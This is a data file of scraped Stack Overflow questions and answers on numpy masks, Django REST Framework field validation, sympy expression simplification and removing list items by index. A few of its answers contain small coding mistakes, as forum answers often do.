Q: How to do a kernel with horizontal stripes fast I wanna do a kernel of zeros and ones. I have a list with pairs of heights (e.g. [[191.0, 243.0], [578.0, 632.0]]. What I want to do is set ones in the kernel on those rows with height between the values of a pair of heights. Example image about what I want to do (in this case 2 pairs, the values above): enter image description here My method makes a double loop but takes minutes to execute. Is there any faster way to do this? Here is the code: mascara = numpy.zeros((height, width),numpy.uint8) #print(mascara) for i in range(height): for j in range(width): #For each element of the kernel (kernel=mascara) indice_parejas = 0 while indice_parejas < numero_de_parejas: #indice_parejas: index that indicates the pair we are checking #print(i,j) #numero_de_parejas: how many pairs we have if i > vector_mascara[indice_parejas][0] and i < vector_mascara[indice_parejas][1]: #If it is between a pair mascara[i][j] = 1 break #we don't have to check the others pairs because we know it is in this pair (get out of the loop) else: indice_parejas = indice_parejas + 1 A: IIUC, it is quite simple: for h0, h1 in hpairs: mask[h0:h1, :] = 1 Reproducible example w, h = 8, 4 mask = np.zeros((w, h), dtype=np.uint8) hpairs = [ [1,3], [5,6], ] for h0, h1 in hpairs: mask[h0:h1, :] = 1 >>> mask array([[0, 0, 0, 0], [1, 1, 1, 1], [1, 1, 1, 1], [0, 0, 0, 0], [0, 0, 0, 0], [1, 1, 1, 1], [0, 0, 0, 0], [0, 0, 0, 0]], dtype=uint8)
How to do a kernel with horizontal stripes fast
I wanna do a kernel of zeros and ones. I have a list with pairs of heights (e.g. [[191.0, 243.0], [578.0, 632.0]]. What I want to do is set ones in the kernel on those rows with height between the values of a pair of heights. Example image about what I want to do (in this case 2 pairs, the values above): enter image description here My method makes a double loop but takes minutes to execute. Is there any faster way to do this? Here is the code: mascara = numpy.zeros((height, width),numpy.uint8) #print(mascara) for i in range(height): for j in range(width): #For each element of the kernel (kernel=mascara) indice_parejas = 0 while indice_parejas < numero_de_parejas: #indice_parejas: index that indicates the pair we are checking #print(i,j) #numero_de_parejas: how many pairs we have if i > vector_mascara[indice_parejas][0] and i < vector_mascara[indice_parejas][1]: #If it is between a pair mascara[i][j] = 1 break #we don't have to check the others pairs because we know it is in this pair (get out of the loop) else: indice_parejas = indice_parejas + 1
[ "IIUC, it is quite simple:\nfor h0, h1 in hpairs:\n mask[h0:h1, :] = 1\n\nReproducible example\nw, h = 8, 4\nmask = np.zeros((w, h), dtype=np.uint8)\n\nhpairs = [\n [1,3],\n [5,6],\n]\n\nfor h0, h1 in hpairs:\n mask[h0:h1, :] = 1\n\n>>> mask\narray([[0, 0, 0, 0],\n [1, 1, 1, 1],\n [1, 1, 1, 1],\n [0, 0, 0, 0],\n [0, 0, 0, 0],\n [1, 1, 1, 1],\n [0, 0, 0, 0],\n [0, 0, 0, 0]], dtype=uint8)\n\n" ]
[ 0 ]
[]
[]
[ "numpy", "python" ]
stackoverflow_0074573234_numpy_python.txt
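For the stripe-mask question above, broadcasting removes the remaining Python loop as well; the small sizes are only to show the idea:

import numpy as np

height, width = 8, 4
pairs = np.array([[1, 3], [5, 6]])        # [start, stop) row ranges

rows = np.arange(height)[:, None]          # shape (height, 1)
in_band = ((rows >= pairs[:, 0]) & (rows < pairs[:, 1])).any(axis=1)

mask = np.zeros((height, width), dtype=np.uint8)
mask[in_band, :] = 1
print(mask)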
Q: Level-field validation in django rest framework 3.1 - access to the old value Before updating object the title field is validated. How to access data of serialized object in order to compare value with older value of this object? from rest_framework import serializers class BlogPostSerializer(serializers.Serializer): title = serializers.CharField(max_length=100) content = serializers.CharField() def validate_title(self, value): """ Check that the blog post is about Django. """ if 'django' not in value.lower(): raise serializers.ValidationError("Blog post is not about Django") return value A: You can do this: def validate_title(self, value): """ Check that the title has not changed. """ if self.instance and value != self.instance.title raise serializers.ValidationError("Title of a blog post cannot be edited ") return value In case of update operations, you will have access to the old object as self.instance. Then you can use that to perform your check. A: You can get the old value of the field from the serializer context. To do this, use validation class with parameter requires_context = True. The __call__ method will then be called with the serializer_field or serializer as an additional argument (manual). from rest_framework import serializers from rest_framework.exceptions import ValidationError class ChangeValidator: requires_context = True def __call__(self, value, serializer_field): instance = getattr(serializer_field.parent, 'instance', None) if instance and value == instance.title raise ValidationError("Title of a blog must be changed") class BlogPostSerializer(serializers.Serializer): title = serializers.CharField(max_length=100, validators=[ChangeValidator()]) content = serializers.CharField()
Level-field validation in django rest framework 3.1 - access to the old value
Before updating object the title field is validated. How to access data of serialized object in order to compare value with older value of this object? from rest_framework import serializers class BlogPostSerializer(serializers.Serializer): title = serializers.CharField(max_length=100) content = serializers.CharField() def validate_title(self, value): """ Check that the blog post is about Django. """ if 'django' not in value.lower(): raise serializers.ValidationError("Blog post is not about Django") return value
[ "You can do this:\ndef validate_title(self, value):\n \"\"\"\n Check that the title has not changed.\n \"\"\"\n if self.instance and value != self.instance.title\n raise serializers.ValidationError(\"Title of a blog post cannot be edited \")\n return value\n\nIn case of update operations, you will have access to the old object as self.instance. Then you can use that to perform your check.\n", "You can get the old value of the field from the serializer context. To do this, use validation class with parameter requires_context = True. The __call__ method will then be called with the serializer_field or serializer as an additional argument (manual).\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\n\nclass ChangeValidator:\n requires_context = True\n\n def __call__(self, value, serializer_field):\n instance = getattr(serializer_field.parent, 'instance', None)\n if instance and value == instance.title\n raise ValidationError(\"Title of a blog must be changed\")\n\n\nclass BlogPostSerializer(serializers.Serializer):\n title = serializers.CharField(max_length=100, validators=[ChangeValidator()])\n content = serializers.CharField()\n\n" ]
[ 2, 0 ]
[]
[]
[ "django", "django_rest_framework", "python", "serialization" ]
stackoverflow_0031089407_django_django_rest_framework_python_serialization.txt
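For the serializer-validation question above, if several fields need the same old-versus-new comparison, an object-level validate() keeps it in one place. This sketch assumes the same BlogPostSerializer fields:

from rest_framework import serializers

class BlogPostSerializer(serializers.Serializer):
    title = serializers.CharField(max_length=100)
    content = serializers.CharField()

    def validate(self, data):
        # self.instance is set on updates and is None on creation.
        if self.instance and data.get("title") != self.instance.title:
            raise serializers.ValidationError({"title": "Title cannot be changed."})
        return data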
Q: Refined manipulation of sympy expressions I am trying to work with sympy and work with manipulation of expressions. import sympy as sym from sympy.abc import t x0,v0 = sym.symbols("x0 v0 ", real=True) wn = sym.symbols("omega_n", positive = True, real=True) z = sym.symbols("zeta", positive = True, real=True) x = sym.Function('x') Dx = sym.Derivative(x(t), t) Dx2= sym.Derivative(x(t), t,2) res = sym.dsolve(Dx2 +2*z*wn*Dx+ wn**2*x(t), x(t), ics = { x(0): x0, Dx.subs(t,0):v0}) The above yields the following expression The part circled in red can be further simplified to , however I can't figure out how is it possible to simplify selected portions of the expression. If I take a simpler exampler wn*x0*z**2/(2*wn*z**2-2*wn) then its possible to cancel out the terms with simplify(), but I could find anywhere some good documentation on how to work and substitute parts of the equation. Another similar issue is with the term , which I would like to transform to A: One way is to use pattern matching. Note that your circled term is a multiplication, containing z**2 (a power operation). # search the expression tree and select all multiplications # containing a power with exponent 2 w = sym.Wild("w", properties=[ lambda e: e.is_Mul and any(t.is_Pow and t.exp == 2 for t in e.args) ]) t = list(res.find(w))[0] print(t) # out: omega_n*x0*zeta**2/(2*omega_n*zeta**2 - 2*omega_n) # Perform the simplification and substitution res = res.subs(t, t.simplify()) Now let's look for the second term in your question: # loop over each exponential term and apply a # powsimp to its argument. for t in res.find(sym.exp): res = res.subs(t, sym.exp(t.args[0].powsimp())) print(res) Edit: similarly, you can apply the same technique to simplify the other square roots on your expression. A: First here is the rhs of your equation: In [58]: res.rhs Out[58]: ⎛ _______ _______⎞ ⎛ 2 _______ _______ _______ _______⎞ ⎛ _______ _______⎞ ⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜ ωₙ⋅x₀⋅ζ ωₙ⋅x₀⋅ζ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ωₙ⋅x₀ v₀⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜- ───────────────────── + ── - ────────────────────────⎟⋅ℯ + ⎜────────────── + ─────────────────────────── - ────────────── + ──────────────────────⎟⋅ℯ ⎜ _______ _______ 2 _______ _______⎟ ⎜ 2 2 2 2 ⎟ ⎝ 2⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 2⋅ωₙ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎝2⋅ωₙ⋅ζ - 2⋅ωₙ 2⋅ωₙ⋅ζ - 2⋅ωₙ 2⋅ωₙ⋅ζ - 2⋅ωₙ 2⋅ωₙ⋅ζ - 2⋅ωₙ ⎠ For the first part of your question what we can do is collect on wn for the rhs of the equation. This has the effect of cancelling out the wn in the terms where they can cancel: In [45]: res.rhs.collect(wn) Out[45]: ⎛ _______ _______⎞ ⎛ 2 _______ _______ _______ _______⎞ ⎛ _______ _______⎞ ⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜ x₀⋅ζ x₀⋅ζ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 x₀ v₀⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜- ───────────────────── + ── - ────────────────────────⎟⋅ℯ + ⎜──────── + ──────────────────────── - ──────── + ──────────────────────⎟⋅ℯ ⎜ _______ _______ 2 _______ _______⎟ ⎜ 2 2 2 ⎛ 2 ⎞ ⎟ ⎝ 2⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 2⋅ωₙ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎝2⋅ζ - 2 2⋅ζ - 2 2⋅ζ - 2 ωₙ⋅⎝2⋅ζ - 2⎠ ⎠ Now we see there are various powers that could be simplified by combining them. In general sqrt(z-1)*sqrt(z+1) is not necessarily equal to sqrt(z**2 - 1) but the assumption that z is positive means that they are equal. 
In that case powsimp should combine those powers: In [46]: res.rhs.collect(wn).powsimp() Out[46]: ⎛ ________ ________⎞ ⎛ _______ _______⎞ ⎜ 2 ╱ 2 ╱ 2 ⎟ ⎛ _______ _______⎞ ⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜ x₀⋅ζ x₀⋅ζ⋅╲╱ ζ - 1 x₀ v₀⋅╲╱ ζ - 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜- ───────────── + ── - ────────────────⎟⋅ℯ + ⎜──────── + ──────────────── - ──────── + ──────────────⎟⋅ℯ ⎜ ________ 2 ________⎟ ⎜ 2 2 2 ⎛ 2 ⎞ ⎟ ⎜ ╱ 2 ╱ 2 ⎟ ⎝2⋅ζ - 2 2⋅ζ - 2 2⋅ζ - 2 ωₙ⋅⎝2⋅ζ - 2⎠ ⎠ ⎝ 2⋅╲╱ ζ - 1 2⋅ωₙ⋅╲╱ ζ - 1 ⎠ Here powsimp didn't apply to the exponents so we need to use deep=True to tell it to look deeper for things to combine: In [47]: res.rhs.collect(wn).powsimp(deep=True) Out[47]: ⎛ ________⎞ ⎛ ________ ________⎞ ⎛ ________⎞ ⎜ ╱ 2 ⎟ ⎜ 2 ╱ 2 ╱ 2 ⎟ ⎜ ╱ 2 ⎟ ⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜ x₀⋅ζ x₀⋅ζ⋅╲╱ ζ - 1 x₀ v₀⋅╲╱ ζ - 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠ ⎜- ───────────── + ── - ────────────────⎟⋅ℯ + ⎜──────── + ──────────────── - ──────── + ──────────────⎟⋅ℯ ⎜ ________ 2 ________⎟ ⎜ 2 2 2 ⎛ 2 ⎞ ⎟ ⎜ ╱ 2 ╱ 2 ⎟ ⎝2⋅ζ - 2 2⋅ζ - 2 2⋅ζ - 2 ωₙ⋅⎝2⋅ζ - 2⎠ ⎠ ⎝ 2⋅╲╱ ζ - 1 2⋅ωₙ⋅╲╱ ζ - 1 ⎠ There are common factors like 2 that we can extract with factor_terms: In [48]: factor_terms(res.rhs.collect(wn).powsimp(deep=True)) Out[48]: ⎛ ________⎞ ⎛ ________⎞ ⎜ ╱ 2 ⎟ ⎛ 2 ⎞ ⎜ ╱ 2 ⎟ ⎛ x₀⋅ζ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜x₀⋅ζ x₀⋅ζ x₀ v₀ ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠ ⎜- ─────────── + x₀ - ──────────────⎟⋅ℯ + ⎜────── + ─────────── - ────── + ──────────────⎟⋅ℯ ⎜ ________ ________⎟ ⎜ 2 ________ 2 ________⎟ ⎜ ╱ 2 ╱ 2 ⎟ ⎜ζ - 1 ╱ 2 ζ - 1 ╱ 2 ⎟ ⎝ ╲╱ ζ - 1 ωₙ⋅╲╱ ζ - 1 ⎠ ⎝ ╲╱ ζ - 1 ωₙ⋅╲╱ ζ - 1 ⎠ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── 2 Now we can collect on powers of z**2 - 1 to reduce the repeating subexpressions: In [55]: factor_terms(res.rhs.collect(wn).powsimp(deep=True)).collect(z**2 - 1) Out[55]: ⎛ v₀⎞ ⎛ ________⎞ ⎛ v₀ ⎞ ⎛ ________⎞ ⎜ -x₀⋅ζ - ──⎟ ⎜ ╱ 2 ⎟ ⎜ 2 x₀⋅ζ + ── ⎟ ⎜ ╱ 2 ⎟ ⎜ ωₙ⎟ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜x₀⋅ζ - x₀ ωₙ ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠ ⎜x₀ + ───────────⎟⋅ℯ ⎜────────── + ───────────⎟⋅ℯ ⎜ ________⎟ ⎜ 2 ________⎟ ⎜ ╱ 2 ⎟ ⎜ ζ - 1 ╱ 2 ⎟ ⎝ ╲╱ ζ - 1 ⎠ ⎝ ╲╱ ζ - 1 ⎠ ─────────────────────────────────────────── + ─────────────────────────────────────────────────── 2 2 Finally applying factor_terms to the coefficients of that last collect allows us to cancel the one remaining awkward term and normalise the minus signs: In [56]: factor_terms(res.rhs.collect(wn).powsimp(deep=True)).collect(z**2 - 1, factor_terms) Out[56]: ⎛ v₀ ⎞ ⎛ ________⎞ ⎛ v₀ ⎞ ⎛ ________⎞ ⎜ x₀⋅ζ + ── ⎟ ⎜ ╱ 2 ⎟ ⎜ x₀⋅ζ + ── ⎟ ⎜ ╱ 2 ⎟ ⎜ ωₙ ⎟ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜ ωₙ ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠ ⎜x₀ - ───────────⎟⋅ℯ ⎜x₀ + ───────────⎟⋅ℯ ⎜ ________⎟ ⎜ ________⎟ ⎜ ╱ 2 ⎟ ⎜ ╱ 2 ⎟ ⎝ ╲╱ ζ - 1 ⎠ ⎝ ╲╱ ζ - 1 ⎠ ─────────────────────────────────────────── + ─────────────────────────────────────────── 2 2
Refined manipulation of sympy expressions
I am trying to work with sympy and work with manipulation of expressions. import sympy as sym from sympy.abc import t x0,v0 = sym.symbols("x0 v0 ", real=True) wn = sym.symbols("omega_n", positive = True, real=True) z = sym.symbols("zeta", positive = True, real=True) x = sym.Function('x') Dx = sym.Derivative(x(t), t) Dx2= sym.Derivative(x(t), t,2) res = sym.dsolve(Dx2 +2*z*wn*Dx+ wn**2*x(t), x(t), ics = { x(0): x0, Dx.subs(t,0):v0}) The above yields the following expression The part circled in red can be further simplified to , however I can't figure out how is it possible to simplify selected portions of the expression. If I take a simpler exampler wn*x0*z**2/(2*wn*z**2-2*wn) then its possible to cancel out the terms with simplify(), but I could find anywhere some good documentation on how to work and substitute parts of the equation. Another similar issue is with the term , which I would like to transform to
[ "One way is to use pattern matching. Note that your circled term is a multiplication, containing z**2 (a power operation).\n# search the expression tree and select all multiplications\n# containing a power with exponent 2\nw = sym.Wild(\"w\", properties=[\n lambda e: e.is_Mul and any(t.is_Pow and t.exp == 2 for t in e.args)\n])\nt = list(res.find(w))[0]\nprint(t)\n# out: omega_n*x0*zeta**2/(2*omega_n*zeta**2 - 2*omega_n)\n\n# Perform the simplification and substitution\nres = res.subs(t, t.simplify())\n\nNow let's look for the second term in your question:\n# loop over each exponential term and apply a\n# powsimp to its argument.\nfor t in res.find(sym.exp):\n res = res.subs(t, sym.exp(t.args[0].powsimp()))\nprint(res)\n\nEdit: similarly, you can apply the same technique to simplify the other square roots on your expression.\n", "First here is the rhs of your equation:\nIn [58]: res.rhs\nOut[58]: \n ⎛ _______ _______⎞ ⎛ 2 _______ _______ _______ _______⎞ ⎛ _______ _______⎞\n⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜ ωₙ⋅x₀⋅ζ ωₙ⋅x₀⋅ζ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ωₙ⋅x₀ v₀⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠\n⎜- ───────────────────── + ── - ────────────────────────⎟⋅ℯ + ⎜────────────── + ─────────────────────────── - ────────────── + ──────────────────────⎟⋅ℯ \n⎜ _______ _______ 2 _______ _______⎟ ⎜ 2 2 2 2 ⎟ \n⎝ 2⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 2⋅ωₙ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎝2⋅ωₙ⋅ζ - 2⋅ωₙ 2⋅ωₙ⋅ζ - 2⋅ωₙ 2⋅ωₙ⋅ζ - 2⋅ωₙ 2⋅ωₙ⋅ζ - 2⋅ωₙ ⎠ \n\nFor the first part of your question what we can do is collect on wn for the rhs of the equation. This has the effect of cancelling out the wn in the terms where they can cancel:\nIn [45]: res.rhs.collect(wn)\nOut[45]: \n ⎛ _______ _______⎞ ⎛ 2 _______ _______ _______ _______⎞ ⎛ _______ _______⎞\n⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜ x₀⋅ζ x₀⋅ζ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 x₀ v₀⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠\n⎜- ───────────────────── + ── - ────────────────────────⎟⋅ℯ + ⎜──────── + ──────────────────────── - ──────── + ──────────────────────⎟⋅ℯ \n⎜ _______ _______ 2 _______ _______⎟ ⎜ 2 2 2 ⎛ 2 ⎞ ⎟ \n⎝ 2⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 2⋅ωₙ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎝2⋅ζ - 2 2⋅ζ - 2 2⋅ζ - 2 ωₙ⋅⎝2⋅ζ - 2⎠ ⎠ \n\nNow we see there are various powers that could be simplified by combining them. In general sqrt(z-1)*sqrt(z+1) is not necessarily equal to sqrt(z**2 - 1) but the assumption that z is positive means that they are equal. 
In that case powsimp should combine those powers:\nIn [46]: res.rhs.collect(wn).powsimp()\nOut[46]: \n ⎛ ________ ________⎞ \n ⎛ _______ _______⎞ ⎜ 2 ╱ 2 ╱ 2 ⎟ ⎛ _______ _______⎞\n⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜ x₀⋅ζ x₀⋅ζ⋅╲╱ ζ - 1 x₀ v₀⋅╲╱ ζ - 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠\n⎜- ───────────── + ── - ────────────────⎟⋅ℯ + ⎜──────── + ──────────────── - ──────── + ──────────────⎟⋅ℯ \n⎜ ________ 2 ________⎟ ⎜ 2 2 2 ⎛ 2 ⎞ ⎟ \n⎜ ╱ 2 ╱ 2 ⎟ ⎝2⋅ζ - 2 2⋅ζ - 2 2⋅ζ - 2 ωₙ⋅⎝2⋅ζ - 2⎠ ⎠ \n⎝ 2⋅╲╱ ζ - 1 2⋅ωₙ⋅╲╱ ζ - 1 ⎠ \n\nHere powsimp didn't apply to the exponents so we need to use deep=True to tell it to look deeper for things to combine:\nIn [47]: res.rhs.collect(wn).powsimp(deep=True)\nOut[47]: \n ⎛ ________⎞ ⎛ ________ ________⎞ ⎛ ________⎞\n ⎜ ╱ 2 ⎟ ⎜ 2 ╱ 2 ╱ 2 ⎟ ⎜ ╱ 2 ⎟\n⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜ x₀⋅ζ x₀⋅ζ⋅╲╱ ζ - 1 x₀ v₀⋅╲╱ ζ - 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠\n⎜- ───────────── + ── - ────────────────⎟⋅ℯ + ⎜──────── + ──────────────── - ──────── + ──────────────⎟⋅ℯ \n⎜ ________ 2 ________⎟ ⎜ 2 2 2 ⎛ 2 ⎞ ⎟ \n⎜ ╱ 2 ╱ 2 ⎟ ⎝2⋅ζ - 2 2⋅ζ - 2 2⋅ζ - 2 ωₙ⋅⎝2⋅ζ - 2⎠ ⎠ \n⎝ 2⋅╲╱ ζ - 1 2⋅ωₙ⋅╲╱ ζ - 1 ⎠ \n\nThere are common factors like 2 that we can extract with factor_terms:\nIn [48]: factor_terms(res.rhs.collect(wn).powsimp(deep=True))\nOut[48]: \n ⎛ ________⎞ ⎛ ________⎞\n ⎜ ╱ 2 ⎟ ⎛ 2 ⎞ ⎜ ╱ 2 ⎟\n⎛ x₀⋅ζ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜x₀⋅ζ x₀⋅ζ x₀ v₀ ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠\n⎜- ─────────── + x₀ - ──────────────⎟⋅ℯ + ⎜────── + ─────────── - ────── + ──────────────⎟⋅ℯ \n⎜ ________ ________⎟ ⎜ 2 ________ 2 ________⎟ \n⎜ ╱ 2 ╱ 2 ⎟ ⎜ζ - 1 ╱ 2 ζ - 1 ╱ 2 ⎟ \n⎝ ╲╱ ζ - 1 ωₙ⋅╲╱ ζ - 1 ⎠ ⎝ ╲╱ ζ - 1 ωₙ⋅╲╱ ζ - 1 ⎠ \n──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\n 2 \n\nNow we can collect on powers of z**2 - 1 to reduce the repeating subexpressions:\nIn [55]: factor_terms(res.rhs.collect(wn).powsimp(deep=True)).collect(z**2 - 1)\nOut[55]: \n⎛ v₀⎞ ⎛ ________⎞ ⎛ v₀ ⎞ ⎛ ________⎞\n⎜ -x₀⋅ζ - ──⎟ ⎜ ╱ 2 ⎟ ⎜ 2 x₀⋅ζ + ── ⎟ ⎜ ╱ 2 ⎟\n⎜ ωₙ⎟ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜x₀⋅ζ - x₀ ωₙ ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠\n⎜x₀ + ───────────⎟⋅ℯ ⎜────────── + ───────────⎟⋅ℯ \n⎜ ________⎟ ⎜ 2 ________⎟ \n⎜ ╱ 2 ⎟ ⎜ ζ - 1 ╱ 2 ⎟ \n⎝ ╲╱ ζ - 1 ⎠ ⎝ ╲╱ ζ - 1 ⎠ \n─────────────────────────────────────────── + ───────────────────────────────────────────────────\n 2 2 \n\nFinally applying factor_terms to the coefficients of that last collect allows us to cancel the one remaining awkward term and normalise the minus signs:\nIn [56]: factor_terms(res.rhs.collect(wn).powsimp(deep=True)).collect(z**2 - 1, factor_terms)\nOut[56]: \n⎛ v₀ ⎞ ⎛ ________⎞ ⎛ v₀ ⎞ ⎛ ________⎞\n⎜ x₀⋅ζ + ── ⎟ ⎜ ╱ 2 ⎟ ⎜ x₀⋅ζ + ── ⎟ ⎜ ╱ 2 ⎟\n⎜ ωₙ ⎟ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜ ωₙ ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠\n⎜x₀ - ───────────⎟⋅ℯ ⎜x₀ + ───────────⎟⋅ℯ \n⎜ ________⎟ ⎜ ________⎟ \n⎜ ╱ 2 ⎟ ⎜ ╱ 2 ⎟ \n⎝ ╲╱ ζ - 1 ⎠ ⎝ ╲╱ ζ - 1 ⎠ \n─────────────────────────────────────────── + ───────────────────────────────────────────\n 2 2\n\n" ]
[ 3, 1 ]
[]
[]
[ "expression", "python", "sympy" ]
stackoverflow_0074574539_expression_python_sympy.txt
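For the sympy question above, if the clean-up is needed for several solutions, the chain of calls from the answer can be wrapped in a small helper. It only bundles the steps already shown and assumes the same wn and z symbols:

import sympy as sym

def tidy(expr, wn, z):
    """collect -> powsimp -> factor_terms pipeline used above."""
    out = sym.factor_terms(expr.collect(wn).powsimp(deep=True))
    return out.collect(z**2 - 1, sym.factor_terms)

# usage: tidy(res.rhs, wn, z)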
Q: Deleting multiple elements in a list - with a list of item locations I have two lists. List1 is the list of items I am trying to format List2 is a list of item locations in List1 that I need to remove (condensing duplicates) The issue seems to be that it first removes the first location (9) and then removes the second (16) after...instead of doing them simultaneously. After it removes 9, the list is changed and 16 is removed in a different intended location because of that. List1 = ["HST", "BA", "CRM", "QQQ", "IYR", "TDG", "HD", "TDY", "UAL", "CRM", "XOM", "CCL", "LLY", "QCOM", "UPS", "MPW", "CCL", "ILMN", "MU", "GOOGL", "AXP", "IVZ", "WY"] List2 = [9, 16] print(List1) print(List2) for x in List2: List1.pop(x) print(List1) A: You can sort List2 and reverse it afterward (sorted(List2, key=List2.index, reverse=True)). Then python will remove these elements from back to the front: List1 = ["HST", "BA", "CRM", "QQQ", "IYR", "TDG", "HD", "TDY", "UAL", "CRM", "XOM", "CCL", "LLY", "QCOM", "UPS", "MPW", "CCL", "ILMN", "MU", "GOOGL", "AXP", "IVZ", "WY"] List2 = [9, 16] List2 = sorted(List2, key=List2.index, reverse=True) for x in List2: List1.pop(x) print(List1) A: try with something like that List1 = ["HST", "BA", "CRM", "QQQ", "IYR", "TDG", "HD", "TDY", "UAL", "CRM", "XOM", "CCL", "LLY", "QCOM", "UPS", "MPW", "CCL", "ILMN", "MU", "GOOGL", "AXP", "IVZ", "WY"] List2 = [9, 16] print(List1) print(List2) for i, x in enumerate(List2): List1.pop(x-i) print(List1) A: Use: S = set(List2) out = [x for i, x in enumerate(List1) if i not in S] A: You can use enumerate to keep count of how many items you have removed and find their new location on the list. If you remove one item, the index of the next item to be removed is -1. for i, j in enumerate(list2): list1.pop(i - j) the enumerate return a tuple with the value of the list and a count of the loop.
Deleting multiple elements in a list - with a list of item locations
I have two lists. List1 is the list of items I am trying to format List2 is a list of item locations in List1 that I need to remove (condensing duplicates) The issue seems to be that it first removes the first location (9) and then removes the second (16) after...instead of doing them simultaneously. After it removes 9, the list is changed and 16 is removed in a different intended location because of that. List1 = ["HST", "BA", "CRM", "QQQ", "IYR", "TDG", "HD", "TDY", "UAL", "CRM", "XOM", "CCL", "LLY", "QCOM", "UPS", "MPW", "CCL", "ILMN", "MU", "GOOGL", "AXP", "IVZ", "WY"] List2 = [9, 16] print(List1) print(List2) for x in List2: List1.pop(x) print(List1)
[ "You can sort List2 and reverse it afterward (sorted(List2, key=List2.index, reverse=True)). Then python will remove these elements from back to the front:\nList1 = [\"HST\", \"BA\", \"CRM\", \"QQQ\", \"IYR\", \"TDG\", \"HD\", \"TDY\", \"UAL\", \"CRM\", \"XOM\", \"CCL\", \"LLY\", \"QCOM\", \"UPS\", \"MPW\", \"CCL\", \"ILMN\", \"MU\", \"GOOGL\", \"AXP\", \"IVZ\", \"WY\"]\nList2 = [9, 16]\n\nList2 = sorted(List2, key=List2.index, reverse=True)\nfor x in List2:\n List1.pop(x)\n\nprint(List1)\n\n\n", "try with something like that\nList1 = [\"HST\", \"BA\", \"CRM\", \"QQQ\", \"IYR\", \"TDG\", \"HD\", \"TDY\", \"UAL\", \"CRM\", \"XOM\", \"CCL\", \"LLY\", \"QCOM\", \"UPS\", \"MPW\", \"CCL\", \"ILMN\", \"MU\", \"GOOGL\", \"AXP\", \"IVZ\", \"WY\"]\nList2 = [9, 16]\n\nprint(List1)\nprint(List2)\n\n\nfor i, x in enumerate(List2):\n List1.pop(x-i)\n\nprint(List1)\n\n", "Use:\nS = set(List2)\n\nout = [x for i, x in enumerate(List1) if i not in S]\n\n", "You can use enumerate to keep count of how many items you have removed and find their new location on the list.\nIf you remove one item, the index of the next item to be removed is -1.\nfor i, j in enumerate(list2):\n list1.pop(i - j)\n\nthe enumerate return a tuple with the value of the list and a count of the loop.\n" ]
[ 1, 0, 0, 0 ]
[]
[]
[ "numpy", "python", "python_3.x" ]
stackoverflow_0074575522_numpy_python_python_3.x.txt
